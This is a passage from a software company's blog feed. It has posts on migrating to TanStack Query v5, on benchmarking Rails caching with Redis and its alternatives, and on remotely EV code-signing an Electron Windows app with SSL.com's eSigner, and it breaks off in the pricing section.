atmaximum?</li><li>How does using <code>load_async</code> affect the connection usage?</li><li>Setting database pool size configuration</li><li>PgBouncer</li><li>Tracking down <code>ActiveRecord::ConnectionTimeoutError</code></li><li>Monitoring Active Record connection pool stats</li></ul><h3><a href="/blog/understanding-queueing-theory">Part 6 - Understanding Queueing Theory</a></h3><ul><li>Queueing systems</li><li>Basic terminology in queueing theory</li><li>Little's law</li><li>The knee curve</li><li>Theoretical parallelism</li><li>Concurrency and effective parallelism</li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Migrating to TanStack Query v5]]></title>
       <author><name>Gaagul C Gigi</name></author>
      <link href="https://www.bigbinary.com/blog/migrating-to-tanstack-query-v5"/>
      <updated>2025-03-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/migrating-to-tanstack-query-v5</id>
      <content type="html"><![CDATA[<p><a href="https://tanstack.com/query/latest">TanStack Query</a> is a powerful data-fetchingand state management library. Since the release of TanStack Query v5, manydevelopers upgrading to the new version have faced challenges in migrating theirexisting functionality. While the official documentation covers all the details,it can be overwhelming, making it easy to miss important updates.</p><p>In this blog, well explain the main updates in TanStack Query v5 and show howto make the switch smoothly.</p><p>For a complete list of changes, check out the<a href="https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5">TanStack Query v5 Migration Guide</a>.</p><h2><a href="https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5#supports-a-single-signature-one-object">Simplified Function Signatures</a></h2><p>In previous versions of React Query, functions like <code>useQuery</code> and <code>useMutation</code>had multiple type overloads. This not only made type maintenance morecomplicated but also led to the need for runtime checks to validate the types ofparameters.</p><p>To streamline the API, TanStack Query v5 introduces a simplified approach: asingle parameter as an object containing the main parameters for each function.</p><ul><li>queryKey / mutationKey</li><li>queryFn / mutationFn</li><li>options</li></ul><p>Below are some examples of how commonly used hooks and <code>queryClient</code> methodshave been restructured.</p><ul><li>Hooks</li></ul><pre><code class="language-javascript">// before (Multiple overloads)useQuery(key, fn, options);useInfiniteQuery(key, fn, options);useMutation(fn, options);useIsFetching(key, filters);useIsMutating(key, filters);// after (Single object parameter)useQuery({ queryKey, queryFn, ...options });useInfiniteQuery({ queryKey, queryFn, ...options });useMutation({ mutationFn, ...options });useIsFetching({ queryKey, ...filters });useIsMutating({ mutationKey, ...filters });</code></pre><ul><li><code>queryClient</code> Methods:</li></ul><pre><code class="language-javascript">// before (Multiple overloads)queryClient.isFetching(key, filters);queryClient.getQueriesData(key, filters);queryClient.setQueriesData(key, updater, filters, options);queryClient.removeQueries(key, filters);queryClient.cancelQueries(key, filters, options);queryClient.invalidateQueries(key, filters, options);// after (Single object parameter)queryClient.isFetching({ queryKey, ...filters });queryClient.getQueriesData({ queryKey, ...filters });queryClient.setQueriesData({ queryKey, ...filters }, updater, options);queryClient.removeQueries({ queryKey, ...filters });queryClient.cancelQueries({ queryKey, ...filters }, options);queryClient.invalidateQueries({ queryKey, ...filters }, options);</code></pre><p>This approach ensures developers can manage and pass parameters more cleanly,while maintaining a more manageable codebase with fewer type issues.</p><h2><a href="https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5#callbacks-on-usequery-and-queryobserver-have-been-removed">Callbacks on useQuery and QueryObserver have been removed</a></h2><p>A significant change in TanStack Query v5 is the removal of callbacks such as<code>onError</code>, <code>onSuccess</code>, and <code>onSettled</code> from <code>useQuery</code> and <code>QueryObserver</code>.This change was made to avoid potential misconceptions about their behavior andto ensure more predictable and consistent side effects.</p><p>Previously, we could define <code>onError</code> directly within the <code>useQuery</code> hook tohandle side effects, such as showing error messages. This eliminated the needfor a separate <code>useEffect</code>.</p><pre><code class="language-javascript">const useUsers = () =&gt; {  return useQuery({    queryKey: [&quot;users&quot;, &quot;list&quot;],    queryFn: fetchUsers,    onError: error =&gt; {      toast.error(error.message);    },  });};</code></pre><p>With the removal of the <code>onError</code> callback, we now need to handle side effectsusing Reacts <code>useEffect</code>.</p><pre><code class="language-javascript">const useUsers = () =&gt; {  const query = useQuery({    queryKey: [&quot;users&quot;, &quot;list&quot;],    queryFn: fetchUsers,  });  React.useEffect(() =&gt; {    if (query.error) {      toast.error(query.error.message);    }  }, [query.error]);  return query;};</code></pre><p>By using <code>useEffect</code>, the issue with this approach becomes much more apparent.For instance, if <code>useUsers()</code> is called twice within the application, it willtrigger two separate error notifications. This is clear when inspecting the<code>useEffect</code> implementation, as each component calling the custom hook registersan independent effect. In contrast, with the <code>onError</code> callback, the behaviormay not be as clear. We might expect errors to be combined, but they are not.</p><p>For these types of scenarios, we can use the global callbacks on the<code>queryCache</code>. These global callbacks will run only once for each query andcannot be overwritten, making them exactly what we need for more predictableside effect handling.</p><pre><code class="language-javascript">const queryClient = new QueryClient({  queryCache: new QueryCache({    onError: error =&gt; toast.error(`Something went wrong: ${error.message}`),  }),});</code></pre><p>Another common use case for callbacks was updating local state based on querydata. While using callbacks for state updates can be straightforward, it maylead to unnecessary re-renders and intermediate render cycles with incorrectvalues.</p><p>For example, consider the scenario where a query fetches a list of 3 users andupdates the local state with the fetched data.</p><pre><code class="language-javascript">export const useUsers = () =&gt; {  const [usersCount, setUsersCount] = React.useState(0);  const { data } = useQuery({    queryKey: [&quot;users&quot;, &quot;list&quot;],    queryFn: fetchUsers,    onSuccess: data =&gt; {      setUsersCount(data.length);    },  });  return { data, usersCount };};</code></pre><p>This example involves three render cycles:</p><ol><li>Initial Render: The <code>data</code> is undefined and <code>usersCount</code> is 0 while the queryis fetching, which is the correct initial state.</li><li>After Query Resolution: Once the query resolves and <code>onSuccess</code> runs, datawill be an array of 3 users. However, since <code>setUsersCount</code> is asynchronous,<code>usersCount</code> will remain 0 until the state update completes. This is wrongbecause values are not in-sync.</li><li>Final Render: After the state update completes, <code>usersCount</code> is updated toreflect the number of users (3), triggering a re-render. At this point, both<code>data</code> and <code>usersCount</code> are in sync and display the correct values.</li></ol><h2><a href="https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5#the-refetchinterval-callback-function-only-gets-query-passed">Updated the behavior of refetchInterval callback function</a></h2><p>The <code>refetchInterval</code> callback now only receives the <code>query</code> object as itsargument, instead of both <code>data</code> and <code>query</code> as it did before. This changesimplifies how callbacks are invoked and it resolves some typing issues thatarose when callbacks were receiving data transformed by the <code>select</code> option.</p><p>To access the data within the query object, we can now use <code>query.state.data</code>.However, keep in mind that this will not include any transformations applied bythe select option. If we need to access the transformed data, we'll need tomanually reapply the transformation.</p><p>For example, consider the following code snippet:</p><pre><code class="language-javascript">const useUsers = () =&gt; {  return useQuery({    queryKey: [&quot;users&quot;, &quot;list&quot;],    queryFn: fetchUsers,    select: data =&gt; data.users,    refetchInterval: (data, query) =&gt; {      if (data?.length &gt; 0) {        return 1000 * 60; // Refetch every minute if there is data      }      return false; // Don't refetch if there is no data    },  });};</code></pre><p>This can now be refactored as follows:</p><pre><code class="language-javascript">const useUsers = () =&gt; {  return useQuery({    queryKey: [&quot;users&quot;, &quot;list&quot;],    queryFn: fetchUsers,    select: data =&gt; data.users,    refetchInterval: query =&gt; {      if (query.state.data?.users?.length &gt; 0) {        return 1000 * 60; // Refetch every minute if there is data      }      return false; // Don't refetch if there is no data    },  });};</code></pre><p>Similarly, the <code>refetchOnWindowFocus</code>, <code>refetchOnMount</code>, and<code>refetchOnReconnect</code> callbacks now only receive the <code>query</code> as an argument.</p><p>Below are the changes to the type signature for the <code>refetchInterval</code> callbackfunction:</p><pre><code class="language-javascript">  // before  refetchInterval: number | false | ((data: TData | undefined, query: Query)    =&gt; number | false | undefined)  // after  refetchInterval: number | false | ((query: Query) =&gt; number | false | undefined)</code></pre><h2><a href="https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5#renamed-cachetime-to-gctime">RenamedcacheTimetogcTime</a></h2><p>The term <code>cacheTime</code> is often misunderstood as the duration for which data iscached. However, it actually defines how long data remains in the cache after aquery becomes unused. During this period, the data remains active andaccessible. Once the query is no longer in use and the specified <code>cacheTime</code>elapses, the data is considered for &quot;garbage collection&quot; to prevent the cachefrom growing excessively. Therefore, the term <code>gcTime</code> more accurately describesthis behavior.</p><pre><code class="language-javascript">  const MINUTE = 1000 * 60;  const queryClient = new QueryClient({    defaultOptions: {      queries: {  -      // cacheTime: 10 * MINUTE, // before  +      gcTime: 10 * MINUTE, // after      },    },  })</code></pre><h2><a href="https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5#removed-keeppreviousdata-in-favor-of-placeholderdata-identity-function">Removed keepPreviousDataoption in favor ofplaceholderData</a></h2><p>The <code>keepPreviousData</code> option and the <code>isPreviousData</code> flag have been removed inTanStack Query v5, as their functionality was largely redundant with the<code>placeholderData</code> and <code>isPlaceholderData</code> options.</p><p>To replicate the behavior of <code>keepPreviousData</code>, the previous query data is nowpassed as a parameter to the <code>placeholderData</code> option. This option can accept anidentity function to return the previous data, effectively mimicking the samebehavior. Additionally, TanStack Query provides a built-in utility function,<code>keepPreviousData</code>, which can be used directly with <code>placeholderData</code> to achievethe same effect as in previous versions.</p><p>Heres how we can use <code>placeholderData</code> to replicate the functionality of<code>keepPreviousData</code>:</p><pre><code class="language-javascript">  import {    useQuery,  +  keepPreviousData // Built-in utility function  } from &quot;@tanstack/react-query&quot;;  const {    data,  -  // isPreviousData,  +  isPlaceholderData, // New  } = useQuery({    queryKey,    queryFn,  - // keepPreviousData: true,  + placeholderData: keepPreviousData // New  });</code></pre><h2><a href="https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5#infinite-queries-now-need-a-initialpageparam">Infinite queries now need aninitialPageParam</a></h2><p>In previous versions of TanStack Query, <strong><code>undefined</code></strong> was passed as thedefault page parameter to the query function in infinite queries. This led topotential issues with non-serializable <code>undefined</code> data being stored in thequery cache.</p><p>To resolve this, TanStack Query v5 introduces an explicit <code>initialPageParam</code>parameter in the infinite query options. This ensures that the page parameter isalways defined, preventing caching issues and making the query state morepredictable.</p><pre><code class="language-javascript">  useInfiniteQuery({    queryKey,  -  // queryFn: ({ pageParam = 0 }) =&gt; fetchSomething(pageParam),    queryFn: ({ pageParam }) =&gt; fetchSomething(pageParam),  +  initialPageParam: 0, // New    getNextPageParam: (lastPage) =&gt; lastPage.next,  })</code></pre><h2><a href="https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5#status-loading-has-been-changed-to-status-pending-and-isloading-has-been-changed-to-ispending-and-isinitialloading-has-now-been-renamed-to-isloading">Status and flag updates</a></h2><p>The <code>loading</code> status is now called <code>pending</code>, and the <code>isLoading</code> flag has beenrenamed to <code>isPending</code>. This change also applies to mutations.</p><p>Additionally, a new <code>isLoading</code> flag has been added for queries. It is nowdefined as the logical AND of <code>isPending</code> and<code>isFetching</code>(<code>isPending &amp;&amp; isFetching</code>). This means that <code>isLoading</code> behaves thesame as the previous <code>isInitialLoading</code>. However, since <code>isInitialLoading</code> isbeing phased out, it will be removed in the next major version.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Benchmarking caching in Rails with Redis vs the alternatives]]></title>
       <author><name>Sandip Mane</name></author>
      <link href="https://www.bigbinary.com/blog/caching-in-rails-with-redis-vs-alternatives"/>
      <updated>2025-02-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/caching-in-rails-with-redis-vs-alternatives</id>
      <content type="html"><![CDATA[<p>Recently, we have seen the rise of Redis alternatives. Some of them claimedsubstantial performance gains. We did this benchmarking to see how muchperformance gain one would get by switching from Redis to one of thealternatives.</p><p>We explored several new contenders like <a href="https://valkey.io/">Valkey</a>,<a href="https://www.dragonflydb.io/">DragonflyDB</a>, and <a href="https://dicedb.io/">DiceDB</a>,which serve as drop-in Redis replacements. We also looked at Rails' own<a href="https://github.com/rails/solid_cache">SolidCache</a>, which challenges in-memorystorage by favoring database-based approach. For this comparison, we included a<a href="https://andyatkinson.com/solid-cache-rails-postgresql#postgresql-optimizations">tuned SolidCache for PostgreSQL</a>,as suggested by <a href="https://x.com/andatki">Andrew Atkinson</a>. We also included<a href="https://fractaledmind.github.io/2024/10/16/sqlite-supercharges-rails/">SolidCache with sqlite3</a>,inspired by Stephen Margheim, who claims to offer significant performance gains.Finally, we added <a href="https://github.com/oldmoe/litestack">litecache with sqlite3</a>to compare it directly against SolidCache.</p><p>Although SolidCache brings various advantages to Rails, this benchmarkingfocused solely on pure performance.</p><h2>Benchmarking details</h2><p>We used<a href="https://gist.github.com/sandip-mane/e4671c3cd01c247a5e8ff9133aa2eca6">this script</a>for benchmarking. It performed 100k read and write operations on a DigitalOceandroplet with a 4GB RAM, 25GB SSD Ubuntu 24.10 x64 setup running a Rails 8application.</p><p>In the case of &quot;Single thread benchmarking&quot; only one thread was created. &quot;Multithread benchmarking&quot; had five threads.</p><p>The data gathered is based on running the same tests five times, with theaverages calculated.</p><p>A simpler version of the script looks like this.</p><pre><code class="language-rb">require &quot;benchmark&quot;# Run it in the SolidCache with PG-tuned setup# ActiveRecord::Base#   .connection#   .execute(&quot;SELECT pg_prewarm('solid_cache_entries')&quot;)# Run the benchmarking for 100k reads and writesn = 100_000def cache_fetch(i)  Rails.cache.fetch([&quot;key&quot;, i], expires_in: 5.minutes) do    &quot;Hello World!&quot;  endend# Clear the existing cacheRails.cache.clearputs &quot;\nSingle thread:&quot;Benchmark.bm(6) do |x|  x.report(&quot;write&quot;) {    n.times { |i| cache_fetch(i) }  }  x.report(&quot;read&quot;) {    n.times { |i| cache_fetch(i) }  }end# Spawn &quot;x&quot; threads and run &quot;n&quot; operations combineddef spawn_threads(x = 5, n)  threads = []  x.times do    threads &lt;&lt; Thread.new do      (n/x).times { |i| cache_fetch(i) }    end  end  threads.each(&amp;:join)end# Clear cache again before running another benchmarkRails.cache.clearputs &quot;\nMultiple threads:&quot;Benchmark.bm(6) do |x|  x.report(&quot;write&quot;) {    spawn_threads(5, n)  }  x.report(&quot;read&quot;) {    spawn_threads(5, n)  }end</code></pre><h3>Single thread performance</h3><p><img src="/blog_images/2025/caching-in-rails-with-redis-vs-alternatives/single-thread.png" alt="code"></p><p>For our comparison, we used Redis as a benchmark.</p><p>Memcached performs similarly to Redis, with Redis having a slight edge in thebenchmark results. However, this difference is unlikely to be significant in areal-world application.</p><p>Valkey and DiceDB deliver similar performance, with Valkey having a slight edgein both read and write operations. However, Redis still remains 1.5x faster thanboth.</p><p>DragonflyDB (not shown in the graph) performed significantly slower in thebenchmarks, which is why it was excluded. However, its performance in Rails 7was comparable to Valkey, suggesting it may require optimizations for Rails 8.</p><p>SolidCache on PostgreSQL is approximately twice as slow as Redis for readoperations and the slowest for writes among all options. However, the tunedversion improves performance significantly, making it 1.5x faster than thestandard PostgreSQL setup. Consider optimizing your cache database if you wantto get maximum performance benefits.</p><p>SolidCache with SQLite3 has shown significant improvement, with read speeds nowcomparable to Redis and write speeds surpassing those of a tuned PostgreSQLsetup.</p><p>Finally, litecache with sqlite3 delivers exceptional performance, beingapproximately 4x faster in read operations and 2.5x faster in writes compared toRedis, making it the fastest option available for Rails and Ruby applications.</p><h3>Multithreaded performance</h3><p><img src="/blog_images/2025/caching-in-rails-with-redis-vs-alternatives/multi-thread.png" alt="code"></p><p>In this test, Redis, Memcache, Valkey, and DiceDB performed similarly to thesingle-thread benchmarks, with slight improvements in write operations. Redismaintained its position as the top performer, continuing to outpace the others.</p><p>Unfortunately, SolidCache with PostgreSQL was the slowest option. However, whentuned, it significantly improved write performance, highlighting the importanceof optimizing the database for better results.</p><p>Surprisingly, SolidCache with SQLite3 delivered performance on par with Redisalternatives while outperforming a tuned PostgreSQL setup by a factor of two,effectively doubling its speed.</p><p>Additionally, LiteCache with SQLite3 outperformed single-thread performance inwrite operations, making it an impressive 4x faster than Redis in both read andwrite operations.</p><h3>Summary</h3><p>Its clear that while data stores like Valkey, Dragonfly, and others claimsignificantly better performance than Redis, using them through Rails APIsdoesnt fully leverage those advantages, leading to performance levels similarto Redis.</p><p>SolidCache with PostgreSQL offers benefits such as fewer dependencies and easiermaintenance, but it was the slowest performer in this test, with high memoryconsumption. However, if you must use SolidCache with PostgreSQL, tuning it asrecommended by Andrew Atkinson is crucial, as it can notably enhance writeperformance.</p><p>On the other hand, SolidCache with SQLite3 was a pleasant surprise, particularlyin the multi-threaded test, where it performed on par with Redis. For adatabase-backed caching solution, this is impressively fast.</p><p>Lastly, while LiteCache with SQLite3 is the fastest option, boasting asignificant 4x performance gain, its not recommended for several reasons.First, it doesnt yet support Rails 8 (we used a forked branch for this test).Second, the <a href="https://github.com/oldmoe/litestack">litestack</a> gem required forthis comes bundled with a variety of additional addons, such as LiteJob,LiteCable, and others. Adding this entire suite of packages just for LiteCachedoesnt make sense. Finally, since the package is still new and in its earlystages, we would not recommend using it for production applications.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to remotely EV code-sign a Windows application using ssl.com]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com"/>
      <updated>2024-12-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com</id>
      <content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a loomalternative. The desktop application was built using Electron. In a series ofblogs, we capture how we built the desktop application and the challenges we raninto. This blog is part 9 of the blog series. You can also read about<a href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron">part 1</a>,<a href="https://www.bigbinary.com/blog/publish-electron-application">part 2</a>,<a href="https://www.bigbinary.com/blog/video-background-removal">part 3</a>,<a href="https://www.bigbinary.com/blog/electron-multiple-browser-windows">part 4</a>,<a href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app">part 5</a>,<a href="https://www.bigbinary.com/blog/deep-link-electron-app">part 6</a>,<a href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron">part 7</a>and <a href="https://www.bigbinary.com/blog/native-modules-electron">part 8</a>.</em></p><p>Code-signing allows Windows to verify the identity of an application'spublisher, making it authentic and trustworthy. Additionally, code-signing helpsapplications comply with Windows security policies, avoiding warnings andinstallation blocks, ultimately building user confidence and providing asmoother, safer experience.</p><h3>What is code-signing?</h3><p>At its core, code-signing involves using a cryptographic hash function to createa unique digital fingerprint of the code. This fingerprint and a certificatefrom a trusted Certificate Authority (CA) form the digital signature. When usersdownload and run the software, their operating system or browser checks thedigital signature to verify its authenticity.</p><p>There are two types of certificates we can use to sign a Windows application:</p><ul><li>Code-signing Certificate</li><li>EV Code-signing Certificate</li></ul><p>A <strong>Standard Code-signing Certificate</strong> provides our application a baselinelevel of security and trust. While it verifies the software publisher's identityand ensures that the code has not been tampered with since it was signed, thevalidation process is less rigorous than EV certificates. It shows a warningduring installation that goes away once enough users have installed ourapplication and we've built up trust.</p><p><strong>Extended Validation (EV) Code-signing Certificates</strong>, on the other hand, offerthe highest level of security and trust. These certificates require a morerigorous vetting process by the Certificate Authority (CA) before they areissued, ensuring that the entity requesting the certificate is thoroughlyverified. This process involves verifying the legal, physical, and operationalexistence of the entity, as well as confirming the identity of the individualrequesting the certificate.</p><p>Unlike Apple, Microsoft allows developers to purchase these certificates on theopen market. They are typically sold by the same companies that offer HTTPScertificates. Prices can vary, so it's worth shopping around. Some popularresellers include:</p><ul><li><a href="https://www.digicert.com/signing/code-signing-certificates">DigiCert code-signing certificate</a></li><li><a href="https://shop.certum.eu/data-security/code-signing-certificates/certum-ev-code-sigining.html">Certum EV code-signing certificate</a></li><li><a href="https://www.entrust.com/products/digital-signing/code-signing-certificates">Entrust code-signing certificate</a></li><li><a href="https://www.ssl.com/certificates/ev-code-signing/">SSL.com EV code-signing certificate</a></li></ul><h3>Why choose EV code-signing?</h3><p>Even though EV code-signing certificates are comparatively pricier than standardcode-signing certificates and have a rigorous vetting process. It is importantto note that, effective June 2023, the<a href="https://cabforum.org/wp-content/uploads/Baseline-Requirements-for-the-Issuance-and-Management-of-Code-Signing.v3.2.pdf">new CA/Browser Forum code-signing requirements</a>is in effect. As a result, publicly trusted Certificate Authorities (CA) willrequire that certificate requestors use an appropriately certified (FIPS 140-2level 2 or Common Criteria EAL 4+) hardware security module (HSM) to protecttheir code-signing private keys. This requirement applies to the issuance ofboth extended validation (EV) certificates and non-EV certificates.</p><p>In simple words, what this means is that standard code-signing certificates nolonger provides benefits they provided in the past. Windows will treat ourapplication as completely unsigned and display the equivalent warning dialogs.Another thing to note here is that since certificates are required to be storedon an HSM, the certificate cannot be simply downloaded onto a CI infrastructure.</p><h3>Cloud-based EV code-signing</h3><p>In the past, EV code-signing could only be performed using a physical USBdongle. Upon purchasing an EV certificate, the provider would send a physicalUSB device containing the certificate. This method required code-signing to beexecuted from a local machine, which posed flexibility challenges, especiallyfor team environments. Additionally, physical USB dongles are prone to loss ordamage.</p><p>As a solution to this, many certificate providers now offer &quot;cloud-based EVsigning,&quot; where the signing hardware is housed in their data centers, allowingus to remotely sign code.</p><p>In this blog, we will look into how we can remotely EV code-sign a Windowsapplication built using Electron, using SSL.com's<a href="https://www.ssl.com/guide/esigner-codesigntool-command-guide/">eSigner CodeSignTool</a></p><h3>Purchase and validate EV certificate from SSL.com</h3><p>For the NeetoRecord desktop application, we used EV certificate from ssl.com andhence we will use ssl.com as an example in this blog.</p><p>Once we sign into <a href="http://ssl.com/">SSL.com</a> and purchase the<a href="https://www.ssl.com/certificates/ev-code-signing/buy/">EV code-signing certificate</a>,We need to validate the certificate. For this, we need to fill out the <strong>EVsubscriber agreement</strong> and <strong>EV authorization form</strong>. Both of them can bedownloaded from<a href="https://www.ssl.com/faqs/what-are-the-requirements-for-ssl-com-ev-certificates/">here</a>.Also, make sure we have <a href="http://www.dnb.com/get-a-duns-number.html">D-U-N-S</a>number or equivalent ready before starting the validation process. To know aboutall the requirements in detail, follow<a href="https://www.ssl.com/faqs/what-are-the-requirements-for-ssl-com-ev-certificates/">this article</a>or watch this <a href="https://www.youtube.com/watch?v=y9rhsL7jZnc">Youtube video</a>.</p><h3>eSigner and CodeSignTool</h3><p><a href="https://www.ssl.com/esigner/">eSigner</a> is SSL.com's cloud signing service thatallows remote access to its HSM hardware from anywhere. We can use our SSL.comsigning credentials to access it.</p><p><a href="https://www.ssl.com/guide/esigner-codesigntool-command-guide/">CodeSignTool</a> isa command-line tool for remotely signing various types of scripts like MSIinstallers, Microsoft Authenticode etc., with eSigner EV code-signingcertificates. Hashes of the files are sent to SSL.com for signing so that thecode itself is not sent. This is ideal where sensitive files need to be signedbut should not be sent over the wire for signing. CodeSignTool is also ideal forautomated batch processes for high-volume signings or integration into existingCI/CD pipeline workflows.</p><h3>Enroll in eSigner</h3><p>To be able to code-sign the application using eSigner, we need to first enrollin eSigner. To do so,</p><ul><li>Navigate to an issued Code-signing order in our SSL.com account. Note that theorder is labeled eSigner Ready.<img src="/blog_images/2024/ev-code-sign-windows-application-ssl-com/esigner-code-signing-01.png" alt="esigner ready"></li><li>Click one of the download links.<img src="/blog_images/2024/ev-code-sign-windows-application-ssl-com/esigner-code-signing-02.png" alt="download link"></li><li>Create and confirm a 4-digit PIN and click the create PIN button.<img src="/blog_images/2024/ev-code-sign-windows-application-ssl-com/esigner-code-signing-03.png" alt="set pin"></li><li>Our certificate will be generated, and after a few moments, a QR code willappear above the certificate downloads table.<img src="/blog_images/2024/ev-code-sign-windows-application-ssl-com/esigner-totp-secret.png" alt="QR code"></li></ul><p>When the eSigner QR code is displayed for our certificate, copy and save thesecret code value shown in a safe location. This is the TOTP (time-basedone-time password) secret associated with our eSigner certificate. Just as 2FAauthentication software like Authy can scan this value from the QR code togenerate valid OTPs for code-signing, CodeSignTool can also use it to generateOTPs are automatically generated during the signing process. In the nextsection, we will use this secret code as <code>totp_secret</code> while integrating withCodeSignTool.</p><p>For more information, check out these articles:<a href="https://www.ssl.com/guide/remote-ev-code-signing-with-esigner/">How to Enroll in eSigner</a>and<a href="https://www.ssl.com/how-to/automate-esigner-ev-code-signing/">Automate eSigner EV Code-signing</a>.</p><h3>Obtain Required Credentials</h3><p>We need to provide the following credentials to the CodeSignTool for it tosuccessfully connect with eSigner and code-sign the application.</p><p>If we haven't purchased a certificate yet and want to try out how it works,SSL.com offers<a href="https://www.ssl.com/guide/esigner-demo-credentials-and-certificates/">eSigner Demo Credentials and Certificates</a>.</p><ul><li>username</li><li>password</li><li>totp_secret</li><li>credential_id</li></ul><p>For <code>username</code> and <code>password</code>, use the same credentials we used to sign in toSSL.com. If needed, we can also add additional users to the same account. Forthe <code>totp_secret</code>, use the secret code we saved during the eSigner enrollmentprocess.</p><p><img src="/blog_images/2024/ev-code-sign-windows-application-ssl-com/esigner-totp-secret.png" alt="QR code"></p><p>To obtain the <code>credential_id</code>, navigate to the certificate details section onthe SSL.com dashboard. The <code>credential_id</code> will be listed under<code>SIGNING CREDENTIALS</code>.</p><p><img src="/blog_images/2024/ev-code-sign-windows-application-ssl-com/ssl-com-credential-id.png" alt="credential id"></p><p>After acquiring all the credentials, add them to GitHub Secrets with thefollowing names:</p><ul><li><code>username</code> -&gt; <code>WINDOWS_SIGN_USER_NAME</code></li><li><code>password</code> -&gt; <code>WINDOWS_SIGN_USER_PASSWORD</code></li><li><code>totp_secret</code> -&gt; <code>WINDOWS_SIGN_USER_TOTP</code></li><li><code>credential_id</code> -&gt; <code>WINDOWS_SIGN_CREDENTIAL_ID</code></li></ul><p>Load up these secrets as environment variables in our Github Action workflow.</p><pre><code class="language-yml">- name: Publish releases    env:      AWS_ACCESS_KEY_ID: ${{secrets.AWS_ACCESS_KEY}}      AWS_SECRET_ACCESS_KEY: ${{secrets.AWS_SECRET}}      WINDOWS_SIGN_USER_NAME: ${{ secrets.WINDOWS_SIGN_USER_NAME }}      WINDOWS_SIGN_USER_PASSWORD: ${{ secrets.WINDOWS_SIGN_USER_PASSWORD }}      WINDOWS_SIGN_USER_TOTP: ${{ secrets.WINDOWS_SIGN_USER_TOTP }}      WINDOWS_SIGN_CREDENTIAL_ID: ${{ secrets.WINDOWS_SIGN_CREDENTIAL_ID }}    run: npm exec electron-builder -- --publish always -mwl</code></pre><h3>Integrate CodeSignTool</h3><p>The Windows version of CodeSignTool is provided as a batch file(<code>CodeSignTool.bat</code>), while the Linux/macOS version is available as a shellscript (<code>CodeSignTool.sh</code>). We can find the download links and more detailsabout CodeSignTool in<a href="https://www.ssl.com/guide/esigner-codesigntool-command-guide/">this article</a></p><p>For our purposes, we'll be using the shell script. Download the Linux/macOSversion, unzip it, and place it in the root directory of our Electron project.</p><p>To integrate the <code>CodeSignTool</code> into the Electron build process, create a script(<code>./scripts/windows-sign.mjs</code>) that runs the <code>CodeSignTool</code> shell script.</p><pre><code class="language-js">import path from &quot;path&quot;;import fs from &quot;fs&quot;;import childProcess from &quot;child_process&quot;;const TEMP_DIR = path.join(__dirname, &quot;../release&quot;, &quot;temp&quot;);if (!fs.existsSync(TEMP_DIR)) {  fs.mkdirSync(TEMP_DIR);}const sign = file =&gt; {  const USER_NAME = process.env.WINDOWS_SIGN_USER_NAME;  const USER_PASSWORD = process.env.WINDOWS_SIGN_USER_PASSWORD;  const CREDENTIAL_ID = process.env.WINDOWS_SIGN_CREDENTIAL_ID;  const USER_TOTP = process.env.WINDOWS_SIGN_USER_TOTP;  if (USER_NAME &amp;&amp; USER_PASSWORD &amp;&amp; USER_TOTP &amp;&amp; CREDENTIAL_ID) {    console.log(`Windows code-signing ${file.path}`);    const { name, dir } = path.parse(file.path);    const tempFile = path.join(TEMP_DIR, name);    const setDir = `cd ./CodeSignTool-v1.3.0`;    const signFile = `./CodeSignTool.sh sign -input_file_path=&quot;${file.path}&quot; -output_dir_path=&quot;${TEMP_DIR}&quot; -credential_id=${CREDENTIAL_ID}   -username=&quot;${USER_NAME}&quot; -password=&quot;${USER_PASSWORD}&quot; -totp_secret=&quot;${USER_TOTP}&quot;`;    const moveFile = `mv &quot;${tempFile}.exe&quot; &quot;${dir}&quot;`;    childProcess.execSync(`${setDir} &amp;&amp; ${signFile} &amp;&amp; ${moveFile}`, {      stdio: &quot;inherit&quot;,    });  } else {    console.warn(`windows-sign.js - Can't sign file, credentials are missing`);    process.exit(1);  }};export default sign;</code></pre><p>The script exports a <code>sign</code> function that accepts an object containing the pathto the file that needs to be signed. It reads all the necessary credentials fromenvironment variables and then passes these credentials along with the filepath.</p><p>To finish up, pass this script to the <code>electron-builder</code> configuration.</p><pre><code class="language-json"> &quot;build&quot;: {    &quot;productName&quot;: &quot;MyProduct&quot;,     &quot;win&quot;: {      &quot;target&quot;: {        &quot;target&quot;: &quot;nsis&quot;,        &quot;arch&quot;: [          &quot;x64&quot;        ]      },      &quot;signingHashAlgorithms&quot;: [        &quot;sha256&quot;      ],      &quot;sign&quot;: &quot;./scripts/windows-sign.mjs&quot;,      &quot;publisherName&quot;: &quot;Neeto LLC&quot;,      &quot;artifactName&quot;: &quot;${productName}-Setup-${version}.${ext}&quot;    }, }</code></pre><p>Here, we pass the script path to the <code>win.sign</code> field in the <code>electron-builder</code>configuration. Once added, <code>electron-builder</code> will call this script for eachfile that needs to be signed.</p><p>Great! With this, we've completed the EV code-signing process for our Windowsapplication. Now, when we run the GitHub Action workflow, it will successfullycode-sign our Windows application.</p><h3>SSL.com pricing</h3><p>As mentioned earlier, EV code signing certificates are expensive. SSL.comcharges $349 per year for an EV code signing certificate, with discountsavailable for multi-year purchases. For more information, visit:https://www.ssl.com/certificates/ev-code-signing/buy/.</p><p>In addition to the certificate cost, we must also subscribe to the eSigner cloudsigning service, which is a subscription-based service. The Tier 1 plan costs$100 per month and allows a maximum of 10 files to be signed, equating to aminimum of $10 per signing. An Electron application requires four files to besigned per build. This means we can only build an Electron application twice permonth under the Tier 1 plan.</p><p>If we need to build the application more than twice per month, we recommendupgrading to Tier 2. This plan costs $300 per month and allows up to 